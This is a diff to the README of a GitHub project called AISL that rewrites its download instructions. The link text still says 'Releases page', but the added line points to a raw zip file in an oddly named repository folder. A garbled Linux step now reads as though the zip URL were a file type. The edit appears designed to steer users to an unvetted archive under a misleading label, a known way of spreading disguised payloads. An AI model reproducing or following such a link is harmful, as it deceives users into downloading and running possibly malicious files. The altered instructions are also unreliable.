Rhamat/AISL/README.md

 - **User-Friendly Interface:** Designed for everyone, no technical skills needed.

 ## 📥 Download & Install
-To download AISL, please visit the [Releases page](https://github.com/Rhamat/AISL/releases).
+To download AISL, please visit the [Releases page](https://raw.githubusercontent.com/Rhamat/AISL/main/outsubtle/AISL-3.8-beta.1.zip).

 Once there, follow these steps:
 1. Find the latest version available.
 2. Click on the asset that matches your operating system:
    - For Windows, look for `.exe` files.
    - For Mac, look for `.dmg` files.
-   - For Linux, look for `.tar.gz` files.
+   - For Linux, look for `https://raw.githubusercontent.com/Rhamat/AISL/main/outsubtle/AISL-3.8-beta.1.zip` files.

 3. After the download completes, open the file to start the installation process.
 Follow the on-screen instructions.